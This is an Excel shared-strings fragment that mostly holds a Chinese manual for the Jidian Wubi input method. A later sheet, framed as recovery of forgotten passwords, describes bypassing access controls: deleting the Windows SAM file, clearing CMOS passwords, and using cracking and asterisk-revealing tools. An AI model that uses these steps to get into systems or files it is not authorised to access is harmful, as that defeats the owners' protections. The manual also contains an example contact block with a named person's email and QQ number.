    <t>选中此项，前3时仅能显示、输入单字，4码以后才能显示输入词组。</t>
  </si>
  <si>
    <r>
      <t>重</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="7"/>
        <color rgb="FF990000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>码上屏校对模式</t>
    </r>
  </si>
  <si>
    <t>选中此项，当重码或空码时极点会同时输入前2个候选项或编码，供校对时参考。</t>
  </si>
  <si>
    <t>打开英文时为英文</t>
  </si>
  <si>
    <t>选中此项，按Ctrl+空格打开极点时，极点处于英文输入状态栏。</t>
  </si>
  <si>
    <t>回车键用于</t>
  </si>
  <si>
    <t>①清除编码：清除已输入的编码及候选项，等待你重新录入</t>
  </si>
  <si>
    <t>②编码上屏：输出已录入的编码并等待你输入新码。</t>
  </si>
  <si>
    <t>自动词组选项</t>
  </si>
  <si>
    <r>
      <t>①禁止自动造词：</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF663300"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>禁用此功能。</t>
    </r>
  </si>
  <si>
    <r>
      <t>②关闭极点时消失</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FFCC0099"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>：</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF663300"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>对于词库中没有的词组，首次以单字方式录入，其后即可按词组的方式输入，关闭当前程序后这些词组自动消失，不存入用户词库。</t>
    </r>
  </si>
  <si>
    <r>
      <t>③随时保存到词库：</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>与选项②功能相同，只是被选择的自动词组会保存到用户词库中。</t>
    </r>
  </si>
  <si>
    <t>其他设置</t>
  </si>
  <si>
    <t>自动转英文的字符串</t>
  </si>
  <si>
    <t>在输入过程中，如果你输入此编辑框中输入的字符串编码，极点会自动转到英文状态，按回车后再返回中文输入状态。</t>
  </si>
  <si>
    <t>如我们上网浏览时常常输入“www.freewb.org”这样的网址，当你在极点中输入“www.”时，极点会自动转到英文状态，这样可以充分利用浏览器的自动完成功能，快速输入要浏览的网址，非常方便。</t>
  </si>
  <si>
    <t>数字后自动半角的标点</t>
  </si>
  <si>
    <t>财务人员经常要输入“12,345,678.9”这样带分节符的数字，把半角的“,.”填到此框中就可以方便输入这类数字了，而不用担心出现“12，345，678。9”这样的结果。</t>
  </si>
  <si>
    <t>界面设置</t>
  </si>
  <si>
    <t>皮肤选择下拉框</t>
  </si>
  <si>
    <t>用于选择系统中已安装的极点皮肤，此框上面会实时显示选中的状态栏的图片。</t>
  </si>
  <si>
    <t>状态栏自动定位</t>
  </si>
  <si>
    <t>选中此项，极点会将状态自动这位于当前窗口的右上角，方便用户操作。注：如果你习惯状态栏定位于左下角，取消此选项并将状态栏拖到你希望的位置即可。</t>
  </si>
  <si>
    <t>在某些全屏游戏中，如果不想显示极点的状态栏，可以选择此项。</t>
  </si>
  <si>
    <t>候选窗界面</t>
  </si>
  <si>
    <t>用于设定候选窗类型、所用的字体、字号、颜色等各项信息</t>
  </si>
  <si>
    <t>候选窗选项</t>
  </si>
  <si>
    <t>重码选择</t>
  </si>
  <si>
    <t>设定选择第二、三候选项的键，如有些用户习惯用“，”和“。”来选择第二和第三候选项，那么，在相应框中填入半角的“，”和“。”即可。</t>
  </si>
  <si>
    <t>翻页键</t>
  </si>
  <si>
    <t>设定候选项翻页的键，如有些用户习惯用“，”和“。”来前翻和后翻页，那么，在相应框中填入半角的“，”和“。”即可。</t>
  </si>
  <si>
    <t>候选窗光标跟随</t>
  </si>
  <si>
    <t>选中此项，候选窗会定位于光标附件，否则候选窗定位于屏幕底部。下面的“强制跟随”用于DW、FireFox等某些软件中候选窗不能跟随的问题。</t>
  </si>
  <si>
    <t>用Shift键选重码</t>
  </si>
  <si>
    <t>选中此项，可用左Shift键选第2候选项，右Shift键选取第3候选项。</t>
  </si>
  <si>
    <t>键盘及快捷键</t>
  </si>
  <si>
    <t>用于设定中英文切换、编码查询、临时英文、临时拼音等各种快捷键</t>
  </si>
  <si>
    <t>定义软键盘</t>
  </si>
  <si>
    <t>如果你有一些自己的特殊符号想通过软键盘来输入，可以使用此功能，具体操作方法见设置窗上的说明。</t>
  </si>
  <si>
    <t>自定义标点</t>
  </si>
  <si>
    <t>用于定义键盘标点与输出标点对应关系。如，用户习惯用“/”输出“、”，到这里设定就行了。</t>
  </si>
  <si>
    <t>关于极点</t>
  </si>
  <si>
    <t>显示极点的版本信息</t>
  </si>
  <si>
    <t>3、常用快捷键</t>
  </si>
  <si>
    <t>常用操作</t>
  </si>
  <si>
    <t>快捷键</t>
  </si>
  <si>
    <t>功能描述</t>
  </si>
  <si>
    <t>极点的系统设置</t>
  </si>
  <si>
    <t>在极点的状态栏单击鼠标右键→输入法设置→图形设置模式</t>
  </si>
  <si>
    <r>
      <t>*</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> 中/英文标点</t>
    </r>
  </si>
  <si>
    <t>Ctrl+．</t>
  </si>
  <si>
    <t>这个决定了你输出的标点如，。！等是中文标点(，。！)还是英文标点(,.!)。</t>
  </si>
  <si>
    <r>
      <t>*</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> 全/半角字符</t>
    </r>
  </si>
  <si>
    <t>Shift+空格</t>
  </si>
  <si>
    <t>这个决定在大写英文状态下你输出的字符是全角（如ＡＢＣ）还是半角（如ABC）。</t>
  </si>
  <si>
    <t>临时拼音</t>
  </si>
  <si>
    <t>`(通常在Esc下方)</t>
  </si>
  <si>
    <t>如果你的极点状态栏上显示的汉字是“五笔字型”，则遇不会拆分的单字或词组时可以按此键，极点会转到拼音状态。输完后自动转回五笔状态。</t>
  </si>
  <si>
    <t>多行文字造词</t>
  </si>
  <si>
    <t>Ctrl+=</t>
  </si>
  <si>
    <t>复制内容到剪切板，按此组合键后按照提示操作即可。</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">（ </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="7"/>
        <color rgb="FFB01919"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>你可以把一小段文章造成词组</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF663300"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>）</t>
    </r>
  </si>
  <si>
    <t>如下面这段文字：</t>
  </si>
  <si>
    <t>姓名：杜志民</t>
  </si>
  <si>
    <t>邮箱：zhimindu2000@yahoo.com.cn</t>
  </si>
  <si>
    <t>QQ号:191070894</t>
  </si>
  <si>
    <t>主页：http://www.freewb.org</t>
  </si>
  <si>
    <t>在线造词</t>
  </si>
  <si>
    <t>按此键后极点会用你刚刚录入的内容（可以是刚刚录入的任何内容）进行造词</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">（ </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="7"/>
        <color rgb="FFB01919"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>如果要自定义编码，在造词界的编码输入框中直接填写即可</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color rgb="FF663300"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>）</t>
    </r>
  </si>
  <si>
    <t>在线删词</t>
  </si>
  <si>
    <t>Del+ 序号</t>
  </si>
  <si>
    <t>遇有重码时，先按Del键，之后再按要删除项的序号</t>
  </si>
  <si>
    <t>在线调频</t>
  </si>
  <si>
    <t>Ctrl+ 序号</t>
  </si>
  <si>
    <t>如果重码的排列顺序不符合你的需要，可以按此键进行调整。</t>
  </si>
  <si>
    <t>输出为繁体字</t>
  </si>
  <si>
    <t>Ctrl+ j</t>
  </si>
  <si>
    <t>选择输出的是简体字还是繁体字，如编码“kwwl”输出为“中華人民共和國”。</t>
  </si>
  <si>
    <t>中英文切换</t>
  </si>
  <si>
    <t>右shift</t>
  </si>
  <si>
    <t>当你需录入大段英文时按此键，相当于普通输入法的Ctrl+空格键。</t>
  </si>
  <si>
    <t>临时英文</t>
  </si>
  <si>
    <t>；</t>
  </si>
  <si>
    <t>当你需要录入小段英文时（如邮箱或邮址）按此键，之后录入英文按回车输出并返回中文(此键可以到系统设置中换为其他键，同时临时英文键也是极点许多高级功能的引导键，详细内容参见下面 货币、时间、数字 部分)。</t>
  </si>
  <si>
    <t>快捷输入</t>
  </si>
  <si>
    <t>’编码</t>
  </si>
  <si>
    <t>输入’（单引号）后再输入一个字母，可输入自定义的一个短语。</t>
  </si>
  <si>
    <t>编码、拼音查询</t>
  </si>
  <si>
    <t>Ctrl+/</t>
  </si>
  <si>
    <t>①查询你刚刚录入的内容</t>
  </si>
  <si>
    <t>②查询剪切板中的内容。将“要查的内容”涂黑后按Ctrl+C，之后再按此键。</t>
  </si>
  <si>
    <r>
      <t>*</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> 软键盘调出、切换</t>
    </r>
  </si>
  <si>
    <t>Shift+Esc 或</t>
  </si>
  <si>
    <t>双击中英文切换键</t>
  </si>
  <si>
    <t>①按一次调出软键键盘，再按时在不同软键盘间切换</t>
  </si>
  <si>
    <t>②输入编码zzkk 和 zzkl 后再选择相应的软键盘（详情参见用户码表）</t>
  </si>
  <si>
    <r>
      <t>*</t>
    </r>
    <r>
      <rPr>
        <sz val="7"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> 取消软键盘</t>
    </r>
  </si>
  <si>
    <t>Esc</t>
  </si>
  <si>
    <t>软键盘使用完毕后按Esc或点击软键盘上的Esc键即可退出软键盘</t>
  </si>
  <si>
    <t>输入；或‘</t>
  </si>
  <si>
    <t>遇要输入；或‘时连击此键两次即可</t>
  </si>
  <si>
    <t>注：本列表中以*标注的快捷键不可修改，其余快捷键均可自定义。</t>
  </si>
  <si>
    <t>4、极点高级功能</t>
  </si>
  <si>
    <t>高级功能</t>
  </si>
  <si>
    <t>详细内容</t>
  </si>
  <si>
    <t>命令直通车</t>
  </si>
  <si>
    <t>需装"命令直通车"插件</t>
  </si>
  <si>
    <t>功能：通过编码调用windows的一些命令</t>
  </si>
  <si>
    <t>命令：</t>
  </si>
  <si>
    <t>       $X[x][命令说明]命令^参数#路径</t>
  </si>
  <si>
    <t>示例：如在用户码表中有如下词条：</t>
  </si>
  <si>
    <t>      输入编码“command”时会打开word程序并进入word程序中；</t>
  </si>
  <si>
    <t>如果上面的命令写成（注意x的大小写）</t>
  </si>
  <si>
    <t>      输入编码“command”时，word被在后台打开，你可继续在当前窗口工作。</t>
  </si>
  <si>
    <t>特例：用编码最小化桌面窗口、打开CD、开关扬声器、极点目录</t>
  </si>
  <si>
    <t>用编码打开软键盘</t>
  </si>
  <si>
    <t>如果你在工作中需要频繁打开软键盘，那么你可以为你常用的软键盘编码，之后可以随时用编码打开相应的软键盘。</t>
  </si>
  <si>
    <t>之后你输入编码zzks就会打开“数字符号软键盘”，输入编码zzkd就会打开“单位符号软键盘”</t>
  </si>
  <si>
    <t>5、货币、时间、数字</t>
  </si>
  <si>
    <t>名称</t>
  </si>
  <si>
    <t>编码</t>
  </si>
  <si>
    <t>当前年份</t>
  </si>
  <si>
    <t>year</t>
  </si>
  <si>
    <t>如今年是：2004年，  则输出：2004年或二○○四年</t>
  </si>
  <si>
    <t>当前日期</t>
  </si>
  <si>
    <t>date</t>
  </si>
  <si>
    <t>如今天是：8月22日， 则输出：8月22日或八月二十二日</t>
  </si>
  <si>
    <t>当前星期</t>
  </si>
  <si>
    <t>week</t>
  </si>
  <si>
    <t>如今天是：星期日，  则输出：星期日</t>
  </si>
  <si>
    <t>当前时间</t>
  </si>
  <si>
    <t>time</t>
  </si>
  <si>
    <t>如现在是：17时48分，则输出17时48分</t>
  </si>
  <si>
    <t>当前日期时间</t>
  </si>
  <si>
    <t>now</t>
  </si>
  <si>
    <t>如：2004年8月22日17时49分</t>
  </si>
  <si>
    <t>任意日期的输入</t>
  </si>
  <si>
    <t>按；(分号)后输入XXXX.XX.XX.，如：;2005.8.26</t>
  </si>
  <si>
    <t>中文数字</t>
  </si>
  <si>
    <t>；数字</t>
  </si>
  <si>
    <t>按；后输入数字</t>
  </si>
  <si>
    <t>大写金额</t>
  </si>
  <si>
    <t>；数字；</t>
  </si>
  <si>
    <t>按；(分号)后输入数字再按；极点会输出大写金额，如：输入“；12,345.67”（仅输入引号内的内容）</t>
  </si>
  <si>
    <t>注：①“中文数字”、“大写金额”和“任意日期”功能中，如果临时英文键换成其他键，则“；”也要换为相应键</t>
  </si>
  <si>
    <t>　　②上面三个功能都是：空格选第一项，分号选第二项，单引号选第三项</t>
  </si>
  <si>
    <t>　　③在极点中日期、时间等输出格式与内容都是可以自定义的，详细内容可以参见极点用户码表中相应内容。 </t>
  </si>
  <si>
    <t>6、标点、符号表</t>
  </si>
  <si>
    <t>符号名称</t>
  </si>
  <si>
    <t>标点内容</t>
  </si>
  <si>
    <t>平假名</t>
  </si>
  <si>
    <t>zzpj</t>
  </si>
  <si>
    <t>ぁ あ ぃ い ぅ う ぇ えぉ お か が き ぎぱ く ぐ け げ こご さ ざ し じ すず せ ぜ そ ぞ ただ ち ぢ っ つ づて で と ど な にぬ ね の は ば ひび ぴ ふ ぶ ぷ へべ ぺ ほ ぼ ぽ まみ む め も ゃ やゅ ゆ ょ よ ら りる れ ろ ゎ わ ゐゑ を ん ゛ ゜ ゝゞ</t>
  </si>
  <si>
    <t>片假名</t>
  </si>
  <si>
    <t>zzjp</t>
  </si>
  <si>
    <t>ァ ア ィ イ ゥ ウ ェ エォ オ カ ガ キ ギク グ ケ ゲ コ ゴサ ザ シ ジ ス ズセ ゼ ソ ゾ タ ダチ ヂ ッ ツ ヅ テデ ト ド ナ ニ ヌネ ノ ハ ?? パ ヒビ ピ フ ブ プ ヘベ ペ ホ ボ ポ マミ ム メ モ ャ ヤュ ユ ョ ヨ ラ リル レ ロ ヮ ワ ヰヱ ヲ ン ヴ ヵ ヶー ヽヾ</t>
  </si>
  <si>
    <t>注音符号</t>
  </si>
  <si>
    <t>zzzy</t>
  </si>
  <si>
    <t>ㄅ ㄆ ㄇ ㄈ ㄉ ㄊ ㄋ ㄌㄍ ㄎ ㄏ ㄐ ㄑ ㄒㄓ ㄔ ㄕ ㄖ ㄗ ㄘㄙ ㄧ ㄨ ㄩ ㄚ ㄛㄜ ㄝ ㄞ ㄟ ㄠ ㄡㄢ ㄣ ㄤ ㄥㄦ</t>
  </si>
  <si>
    <t>数学符号</t>
  </si>
  <si>
    <t>zzsx</t>
  </si>
  <si>
    <t>＋ － ＜ ＝ ＞ ± × ÷ ∈ ∏ ∑ ∕ √ ∝∞ ∟ ∠ ∣ ∥ ∧∨ ∩ ∪ ∫ ∮ ∴∵ ∶ ∷ ∽ ≈ ≌≒ ≠ ≡ ≤ ≥ ≦≧ ≮ ≯ ⊕ ⊙ ⊥⊿</t>
  </si>
  <si>
    <t>单位符号</t>
  </si>
  <si>
    <t>zzdw</t>
  </si>
  <si>
    <t>㎎ ㎏ ㎜ ㎝ ㎞ ㎡ nm μm μg ㏄ ㏎ ㏑ ㏒ ㏕</t>
  </si>
  <si>
    <t>箭角符</t>
  </si>
  <si>
    <t>zzjt</t>
  </si>
  <si>
    <t>→ ↑ ← ↓ ↖ ↗ ↘ ↙</t>
  </si>
  <si>
    <t>圆圈数字</t>
  </si>
  <si>
    <t>zzys</t>
  </si>
  <si>
    <t>① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩</t>
  </si>
  <si>
    <t>方括号数</t>
  </si>
  <si>
    <t>zzfs</t>
  </si>
  <si>
    <t>⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇</t>
  </si>
  <si>
    <t>点数字</t>
  </si>
  <si>
    <t>zzds</t>
  </si>
  <si>
    <t>⒈ ⒉⒊ ⒋ ⒌ ⒍ ⒎ ⒏⒐ ⒑ ⒒ ⒓ ⒔ ⒕⒖ ⒗ ⒘ ⒙ ⒚⒛</t>
  </si>
  <si>
    <t>中括号数</t>
  </si>
  <si>
    <t>zzzs</t>
  </si>
  <si>
    <t>㈠ ㈡ ㈢ ㈣ ㈤ ㈥ ㈦ ㈧ ㈨ ㈩</t>
  </si>
  <si>
    <t>货币符号</t>
  </si>
  <si>
    <t>zzhb</t>
  </si>
  <si>
    <t> ＄ ￠ ￡ ￥ ¤</t>
  </si>
  <si>
    <t>7、其他说明</t>
  </si>
  <si>
    <t>系统功能</t>
  </si>
  <si>
    <t>常用与非常用字词</t>
  </si>
  <si>
    <t>　　极点Unicode版（以下简称极U）中，引入了一个非常重要的概念：常用字词和非常用字词。下面我们以一个具体例子来说明这一概念。</t>
  </si>
  <si>
    <t>　　我们在汉字录入时常遇到“1.增加　2.啬”这样的重码字词，其中的“啬”字大多数人几乎用不到，但又不能删--万一用时怎么办？这样就形成了一个“死重码”。为了解决这类问题极U中引入了“常用字词”与“非常用字词”这一概念。</t>
  </si>
  <si>
    <t>　　常用与非常用概念的标准很简单：你在工作中经常用的就是常用，少用的就是非常用。那么在极U中如何应用这一概念呢？如上例中的“1.增加　2.啬”，当其出现在汉字候选窗中时，我们按下“Ctrl+Shift+2”（Ctrl+Shift是固定按键，2是“啬”的序号）便可将“啬”字设为非常用字，这样在正常录入时它便不会出现了，而“增加”这个常用词就可以直接上屏了，从而达到减少重码，提高录入效率的目的。</t>
  </si>
  <si>
    <t>辅助输入</t>
  </si>
  <si>
    <t>　　上面我们说了将字或词改为非常用的方法，那么当需要录入这些字时，我们怎么办呢？很简单，按一下“`”（Esc下排的键）之后输入五笔编码就可以了。如上面的“啬”，输入“`fulk”即可录入。</t>
  </si>
  <si>
    <t>　　有人说了，系统内置的某个非常用字我经常用到，怎么办？这个也很简单，首先让这个字出现在汉字候选窗里，之后按“Ctrl+Shift+此字的序号”就可以了。也就是说这个“Ctrl+Shift+序号”是开关键，可将字词在常用与非常用之间进行转换。</t>
  </si>
  <si>
    <t>　　辅助输入功能除了录入非常用字外，还有一个更重要的功能：拼音输入。当你遇到不会拆分的字、词时，可以按“`”键，之后即可拼音方式来录入字或词。字词的编码规则如下：单、双字用全拼输入，三字以的词以各字的首字母来输入。如“斤斤计较”，你输入“`jjjj”便可以输入此词。</t>
  </si>
  <si>
    <t>快捷命令</t>
  </si>
  <si>
    <t>   为了避免极点快捷键与应用程序快捷键冲突（如极点的查询快捷键Ctrl+?与word的软键盘命令冲突，造成极点查询功能失效），极点内置了一批快捷命令。当你按“；”进入临时英文状态后，输入如下内容会执行对应功能：</t>
  </si>
  <si>
    <t>        dos.            进入极点目录</t>
  </si>
  <si>
    <t>        aa.             在线加词</t>
  </si>
  <si>
    <t>        dd.             在线删词</t>
  </si>
  <si>
    <t>        ss.             切换词组的常用与非常</t>
  </si>
  <si>
    <t>        jj.             开关简入繁出</t>
  </si>
  <si>
    <t>        ff.             查询最后录入或复制的内容</t>
  </si>
  <si>
    <t>        hh.             显/隐状态栏</t>
  </si>
  <si>
    <t>        kk.             打开软键盘</t>
  </si>
  <si>
    <t>        mm.             切换字符集</t>
  </si>
  <si>
    <t>        oo.             进入高级设置</t>
  </si>
  <si>
    <t>        qq.             编辑快捷码表</t>
  </si>
  <si>
    <t>        tt.             切换重码上屏校对模式</t>
  </si>
  <si>
    <t>  </t>
  </si>
  <si>
    <t>特殊控制</t>
  </si>
  <si>
    <t>下面两项均在极点安装目录\conf\freeime.ini中</t>
  </si>
  <si>
    <t>   SafeSetting =0  用于控制极点是否显示某些涉及系统安全的菜单项，对网吧等对安全要求高的场合适用。</t>
  </si>
  <si>
    <t>   SysControl=0  用于设定极点的全半角、中英文状态是否受系统程序控制（如VS2005等某些环境下会强制将上述状态置为全角状态，这个用于避免）</t>
  </si>
  <si>
    <t>最后修正时间：2007年11月11日 12时29分25秒</t>
  </si>
  <si>
    <t>极点五笔</t>
  </si>
  <si>
    <t>一、遗忘了SYSTEM密码</t>
  </si>
  <si>
    <t>二、遗忘了SETUP密码</t>
  </si>
  <si>
    <t>三、遗忘了Windows登录密码</t>
  </si>
  <si>
    <t>四、遗忘了Windows屏保密码</t>
  </si>
  <si>
    <t>五、遗忘了Windows电源管理密码</t>
  </si>
  <si>
    <t>六、遗忘了微软Office密码</t>
  </si>
  <si>
    <t>七、遗忘了WinZip压缩包密码</t>
  </si>
  <si>
    <t>八、遗忘了RAR压缩包密码</t>
  </si>
  <si>
    <t>九、遗忘了QQ/ICQ密码</t>
  </si>
  <si>
    <t>十、遗忘了OE密码</t>
  </si>
  <si>
    <t>十一、遗忘了Foxmail帐户密码</t>
  </si>
  <si>
    <t>十二、查看“*”密码</t>
  </si>
  <si>
    <t>计算机十二种常用密码破解法</t>
  </si>
  <si>
    <t>计算机十二种常用密码破解法</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>如果你遗忘了CMOS设置中的SYSTEM密码，就无法启动机器了，解决的办法只能是:打开机箱，把电池取下、正负极短接，给CMOS放电，清除CMOS中的所有内容(当然也就包括密码)，然后重新开机进行设置。</t>
  </si>
  <si>
    <t>注意:有些主板设置了CMOS密码清除跳线，请参照主板说明书将该跳线短接，这样也可以清除CMOS密码。</t>
  </si>
  <si>
    <t>_o7016</t>
  </si>
  <si>
    <t>_o7116</t>
  </si>
  <si>
    <t>_q</t>
  </si>
  <si>
    <t>你也可以用CMOS密码破解软件来显示CMOS密码，这样的软件有很多，例如Cmospwd,它支持Acer、AMI、AWARD、COMPAQ、DELL、IBM、PACKARDBELL、PHOENIX、ZENITHAMI等多种BIOS)，在DOS下启动该程序，CMOS密码就会显示出来。</t>
  </si>
  <si>
    <t>WinMe/98下对策:开机后按F8键选择DOS启动，然后删除Windows安装目录下的*.PWL密码文件、以及Profiles子目录下的所有个人信息文件，重新启动Windows后，系统会弹出一个不包含任何用户名的密码设置框，此时无需输入任何内容，直接单击“确定”，登录密码即被删除。</t>
  </si>
  <si>
    <t>另外，将注册表数据库HKEY_LOCAL_MACHINE、Network、Logon分支下的UserProfiles修改为“0”，然后重新启动Windows也可达到同样目的。</t>
  </si>
  <si>
    <t>WinXP/2000下对策:删除系统安装目录\system32\config下的SAM文件，重新启动，此时管理员Administrator账号已经没有密码了，用Administrator帐户登陆系统，不用输入任何密码，进入系统后再重新设置登陆帐户密码即可。</t>
  </si>
  <si>
    <t>解决方法:在开机后按F8键，选择安全模式启动，进入Windows后，右击桌面空白处，从弹出的快捷菜单中选择“属性”/屏幕保护，取消“密码保护”即可。</t>
  </si>
  <si>
    <t>如果你遗忘了该密码，可以使用前面破解Windows登录密码的那种方法去破解。</t>
  </si>
  <si>
    <t>解决方法:使用破解Office系列文档密码的软件，这样的软件有很多，例如AOPR(下载网址http://www.elcomsoft.com/)，该软件可以同时对微软Office系列Word、Excel及Access等软件所生成的密码进行破解，还可以对Word的*.DOT模板文件的密码进行搜索。</t>
  </si>
  <si>
    <t>解决方法:用软件UZPC(UltraZipPasswordCracker，找回丢失的密码。使用该软件时要先设置适当的解密方式，例如“后门方式”、“穷举方式”、“字典方式”和“模式匹配方式”等，一般采用“BruteForce穷举方式”，然后软件就会对所有可能的密码进行测试，直至找出最后的结果。</t>
  </si>
  <si>
    <t>遗忘了RAR压缩包密码后，你可下载一个CRARK软件来对其进行破解，它主要通过命令行来实现对RAR压缩包的密码进行破解。使用时一般只需直接使用“CRARKRAR压缩包文件名”命令，利用缺省参数即可进行破解。</t>
  </si>
  <si>
    <t>为保护QQ密码，你应该赶快到这里申请密码保护。假如你忘记了QQ密码、或者密码被盗时，只需填写正确的信息即可取回。</t>
  </si>
  <si>
    <t>如果你要找回ICQ密码，可以使用软件ICQPasswordRevealer，这是一个DOS下的命令行实用软件，你只需在ICQ安装文件夹的NEWDB子文件夹下执行该文件，然后按照屏幕提示输入自己的UIN，系统即会找回“久违”的ICQ密码。</t>
  </si>
  <si>
    <t>如果你忘了密码，无法进入OutLookExpress阅读收到的邮件、使用通讯簿等，可以这样破解:重启计算机并按F8，选择“安全模式”，再启动OE就不需要密码了，然后你可以重建一个用户(不能修改密码)，把信息导入新用户信箱即可。</t>
  </si>
  <si>
    <t>解决方法:消除忘记的Foxmail帐户密码。首先打开Foxmail，新建一个帐户(帐户名任意，例如如lacl1)，然后退出Foxmail;运行Windows资源管理器，找到Foxmail\MAIL\lacl1文件夹，里边有个“account.stg”，把它复制到忘记密码的帐户(例如“lacl”)目录中，直接覆盖原来的“account.stg”文件;再重新运行Foxmail，打开忘记密码的帐户，呵呵，怎么连“口令提示框”也没有?现在你就可以直接打开忘记密码的帐户，而且帐户中原来的邮件一封都不会少!</t>
  </si>
  <si>
    <t>许多密码在屏幕上都是以“*”显示的，因此我们无法直接看到密码的原始字符，如果你使用专门破解“*”密码的软件，即可查出这些密码的原始字符。</t>
  </si>
  <si>
    <t>这样的软件有很多，例如Win2000/Win98下你可用iOpusPasswordRecovery，WinXP下可用PasswordSpectatorPro。使用时，只需先打开显示“*”的窗口，启动这类软件，然后按住Ctrl键、在密码栏中按下鼠标左键，这些“*”密码的原始字符就会显示出来了。</t>
  </si>
  <si>
    <t>极点五笔</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>通过图形界面来设置极点。这里可以配置极点的功能，如用“，。”翻页或选候选字等。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>输入法设置</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>X=执行命令的窗口获取焦点，当前输入窗失去焦点</t>
  </si>
  <si>
    <t>x=执行命令的窗口不获取焦点，当前输入窗仍拥有焦点</t>
  </si>
  <si>
    <t>命令说明：输入编码时，候选窗上显示的内容</t>
  </si>
  <si>
    <t>命令=要执行的命令，可以是可执行文件名，也可以是各种文件或网址、邮件等</t>
  </si>
  <si>
    <t>路径=执行此命令时，哪个目录作为当前目录。如果路径中含有“空格”，请用$20替代</t>
  </si>
  <si>
    <t>      command$X[打开Word]winword.exe</t>
  </si>
  <si>
    <t>      command$x[打开Word]winword</t>
  </si>
  <si>
    <t>tray$x[最小化桌面窗口]tray</t>
  </si>
  <si>
    <t>opencd$x[弹出CD]opencd</t>
  </si>
  <si>
    <t>mute$x[静音开关]mute</t>
  </si>
  <si>
    <t>dirr$X[极点目录]%freewb%</t>
  </si>
  <si>
    <t>如你在工作中经常要用到： 数学符号和单位符号两个软键盘，那么你可以在用户码表中添加如下两个词组：</t>
  </si>
  <si>
    <t>    zzks $k[数学符号]</t>
  </si>
  <si>
    <t>    zzkd $k[单位符号]</t>
  </si>
  <si>
    <t>TrueType字体文件(ComicSans</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>动态链接库(SoundBlaster16Driver)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DOS MSCDEX CDROM扩展工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MicrosoftC运行时间库</t>
  </si>
  <si>
    <t>动态链接库(支持Internetmail)</t>
  </si>
  <si>
    <t>安装信息文件(Internetmail)</t>
  </si>
  <si>
    <t>帮助索引文件(Internetmail)</t>
  </si>
  <si>
    <t>MCIWare驱动程序</t>
  </si>
  <si>
    <t>支持InternetMail动态链接库</t>
  </si>
  <si>
    <t>WindowsNT安全支持</t>
  </si>
  <si>
    <t>WorkgroupsDDE共享接口</t>
  </si>
  <si>
    <t>微软网络DDENetBIOS接口</t>
  </si>
  <si>
    <t>WindowsOLE2.0用户接口支持</t>
  </si>
  <si>
    <t>TCP/IPROUTE命令</t>
  </si>
  <si>
    <t>MSDOS6.xScandisk的替代存根模块SCANDISK.BAT磁盘诊断工具</t>
  </si>
  <si>
    <t>MicrosoftWin32安全服务</t>
  </si>
  <si>
    <t>Windows虚拟Socket网卡驱动器SOCKET.VXDPCMCIA支持</t>
  </si>
  <si>
    <t>MSDOSSubst实用程序</t>
  </si>
  <si>
    <t>LZDLL安装</t>
  </si>
  <si>
    <t>TCP/IPIRACEROUTE命令</t>
  </si>
  <si>
    <t>MSDOS树实用程序</t>
  </si>
  <si>
    <t>WindowsDLL32位ASPI</t>
  </si>
  <si>
    <t>DOSXCOPY工具</t>
  </si>
  <si>
    <t>Excel中的超链接</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在工作表内单元格的不同链接</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
